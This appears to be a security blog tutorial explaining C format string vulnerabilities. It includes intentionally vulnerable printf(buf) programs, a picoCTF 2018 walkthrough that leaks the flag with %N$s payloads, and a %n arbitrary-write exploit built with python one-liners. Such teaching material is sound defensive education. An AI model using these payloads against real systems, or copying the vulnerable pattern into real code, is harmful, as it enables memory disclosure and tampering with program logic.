Format String Exploit

Posted by

One of the most commonly used functions in C is printf(). Its functionality is straightforward and simple – print formatted data. However, even this seemingly simple function can be exploited if programmers are careless. In this post, we’ll look at a vulnerability called the Format String Vulnerability. It causes a memory leak in the program stack.

Note: I haven’t worked on this exploit as part of any of my projects. I’ve been able to get a good example from picoCTF 2018, but most of the examples are generic.

The Cause

The syntax of printf() can be checked from its man 3 page

int printf(const char *format, ...);

The first argument is a format string followed by a variable number of arguments. We’ve commonly seen printf() being used as

printf ("%d", some_variable);

The string containing %d is called the format string.

When printf() is called, it expects the first argument (format string) to be at return address + 4 bytes, the second argument (variable address) at return address + 8 bytes and so on, if there are more variables. This will be obvious to those who understand the program stack structure. If you don’t find this intuitive, I would suggest you to refresh your knowledge of the program stack.

Arbitrary Read

Let’s assume that a programmer called the function as printf (some_variable);

printf() will consider the value in some_variable as the format string. Consider the following program, format_string_vuln.c which echoes the input (ignore buffer overflow):

int main (void) {
    char buf[16];
    gets(buf);
    printf (buf);
    return 0;
}

Compilation

nikhilh@ubuntu:~$ gcc -o format_string_vuln format_string_vuln.c
format_string_vuln.c: In function ‘main’:
format_string_vuln.c:5:5: warning: implicit declaration of function ‘gets’; did you mean ‘fgets’? [-Wimplicit-function-declaration]
gets(buf);
^~~~
fgets
format_string_vuln.c:6:13: warning: format not a string literal and no format arguments [-Wformat-security]
printf (buf);
^~~
/tmp/ccYnCPth.o: In function `main':
format_string_vuln.c:(.text+0x24): warning: the `gets' function is dangerous and should not be used.

Finding the Connection

nikhilh@ubuntu:~$ ./format_string_vuln
AAAA
AAAA

nikhilh@ubuntu:~$ ./format_string_vuln
%x %x %x
b7f6f000 b7f6d244 b7dd50ec

Do those numbers look familiar? Don’t they look like something you’d find on the program stack?

nikhilh@ubuntu:~$ gdb -q format_string_vuln
Reading symbols from format_string_vuln...(no debugging symbols found)...done.
(gdb) disas main
Dump of assembler code for function main:
0x0804849b : lea 0x4(%esp),%ecx
0x0804849f : and $0xfffffff0,%esp
0x080484a2 : pushl -0x4(%ecx)
...
...
0x080484cc : push %eax
0x080484cd : call 0x8048350 0x080484d2 : add $0x10,%esp
...
...
0x080484f2 : ret
End of assembler dump.

(gdb) b * 0x080484cd
Breakpoint 1 at 0x80484cd

(gdb) r
Starting program: /home/nikhilh/format_string_vuln
A
Breakpoint 1, 0x080484cd in main ()

(gdb) x/4xw $esp
0xbfffef60: 0xbfffef7c 0xb7fba000 0xb7fb8244 0xb7e200ec

The stack data is being leaked!

If printf() is provided with format strings, it expects to see associated variables in the printf() call statement. If the programmer doesn’t specify the variables, printf() will still try to read a value, return address + 8 bytes. It ends up reading data off the stack.

Hack It!

I came across a format string vulnerability based problem in picoCTF 2018. Consider the following snippets from the file, echo.c:

...
int main(int argc, char **argv) {
    setvbuf(stdout, NULL, _IONBF, 0);

    char buf[64];
    char flag[64];
    char *flag_ptr = flag;
...
...
    FILE *file = fopen("flag.txt", "r");
    if (file == NULL) {
        printf("Flag File is Missing. Problem is Misconfigured, please contact an Admin if you are running this on the shell server.\n");
        exit(0);
    }
...
...
    fgets(flag, sizeof(flag), file);
    while(1) {
        printf("> ");
        fgets(buf, sizeof(buf), stdin);
        printf(buf);
    }

    return 0;
}

We can clearly see the vulnerability:

printf(buf);

The character array, flag is present on the program stack. If we can get printf() to print a list of addresses, we can use trial-and-error to find the address of flag and read its contents.

nikel@pico-2018-shell-1:~$ nc 2018shell1.picoctf.com 46960
Time to learn about Format Strings!
We will evaluate any format string you give us with printf().
See if you can get the flag!

> %x %x %x %x %x %x %x %x %x %x %x
40 f771c5a0 8048647 f7753a74 1 f772b490 ffe41f34 ffe41e3c 493 88d4008 25207825

> %x %x %x %x %x %x %x %x %x %x
40 f771c5a0 8048647 f7753a74 1 f772b490 ffe41f34 ffe41e3c 493 88d4008

> %2$s
uuppppppa

> %4$s
`r

> %6$s
Xii

> %7$s
.

> %8$s
picoCTF{foRm4t_stRinGs_aRe_DanGer0us_a7bc4a2d}

Notice that I’ve tried only those addresses that look like they belong to an auto variable. There’s no point in trying addresses such as 0x8048647, because that is obviously not an auto variable’s address.

Imagine if a critical system password was stored in the flag variable. That would be a disaster, wouldn’t it?

Arbitrary Write

We’ve seen an example of an arbitrary read. But what can be worse than an arbitrary read? An arbitrary write.

Well, almost arbitrary. We already know that auto variables exist on the stack. It is not difficult to imagine corruption in a certain variable’s value which will allow a cybercriminal to access code in an unauthorized manner.

Consider the following code snippet from format_string_vuln.c:

...
int flag;

int main (void) {
    char buf[16];
    flag = 0;

    gets(buf);
    printf (buf);

    if (flag)
        printf("You reached me!\n");

    return 0;
}

The variable, flag exists in the bss memory segment because it is uninitialized. If it were initialized, it would exist in the data memory segment. Let’s assume that under normal circumstances, the if block is inaccessible. The cybercriminal’s aim would be to enter the if block.

Compilation

nikhilh@ubuntu:~$ gcc -fno-stack-protector -o format_string_vuln format_string_vuln.c
format_string_vuln.c: In function ‘main’:
format_string_vuln.c:9:5: warning: implicit declaration of function ‘gets’ [-Wimplicit-function-declaration]
gets(buf);
^
format_string_vuln.c:10:13: warning: format not a string literal and no format arguments [-Wformat-security]
printf (buf);
^
/tmp/ccgUZTWo.o: In function `main':
format_string_vuln.c:(.text+0x23): warning: the `gets' function is dangerous and should not be used.

Notice the usage of the -fno-stack-protector flag. Unlike an arbitrary read, we’re actually writing on the stack. It causes a change in the stack canary value leading to a stack smashing detected error.

nikhilh@ubuntu:~$ python -c "print ('\x2c\xa0\x04\x08' + '%x '*4 + '%x ')" | ./format_string_vuln
*** stack smashing detected ***: ./format_string_vuln terminated
,�b7f9b000 b7f99244 b7e010ec 1 1 Aborted (core dumped)

Finding the Connection

At this point, we know that memory addresses can be read off the stack. In this case, we need to write to a specific address, i.e., the address of variable, flag. Our aim is to place the address of flag on the stack and use the %n format string to write to it.

But how do we find the address of flag? objdump to the rescue!

nikhilh@ubuntu:~$ objdump -t format_string_vuln | grep flag
0804a028 g O .bss 00000004 flag

The -t flag displays the contents of the symbol table.

We now know the address to which we are going to write. We need to find a way to get it on the stack. This is easy and intuitive. If we pass the address to printf() as an argument, it’ll be placed on the stack. This should be obvious to those who understand the C function call mechanism.

If we form a format string which consists of multiple %x and the address of flag, the program is bound to output the address of flag back to us at some point. This follows the concept of arbitrary read that we discussed before.

nikhilh@ubuntu:~$ python -c "print ('\x28\xa0\x04\x08' + '%x '*3)" | ./format_string_vuln
(�1 b7d9ca50 804851b

nikhilh@ubuntu:~$ python -c "print ('\x28\xa0\x04\x08' + '%x '*4)" | ./format_string_vuln
(�1 b7e28a50 804851b 804a028

Hack it!

We’ll use the %n format string to write to the target address. We need to ensure that %n corresponds to the address of flag. So, we need to use '%x'*3. The next address on the stack will be the address of flag and that will correspond to %n.

nikhilh@ubuntu:~$ python -c "print ('\x28\xa0\x04\x08' + '%x '*3 + '%n ')" | ./format_string_vuln
(�1 b7e1ea50 804851b You reached me!

We entered the if block! If that block had critical code which executed based on the correctness of a value, this exploit would cause havoc.

Done!

Format string exploits are immune to DEP and ASLR. They don’t involve execution of any shellcode on the stack and the bss, data and text memory segments are not randomized by ASLR. However, they are very easy to detect.

I suspect that these vulnerabilities don’t exist anymore, but you never know when you come across one. It is important for budding security engineers to understand the past, so that they can avoid repeating the mistake and also help others.

Thank you for reading! If you have any questions, please leave them in the comments section below and I’ll get back to you as soon as I can!

Leave a Reply

Your email address will not be published.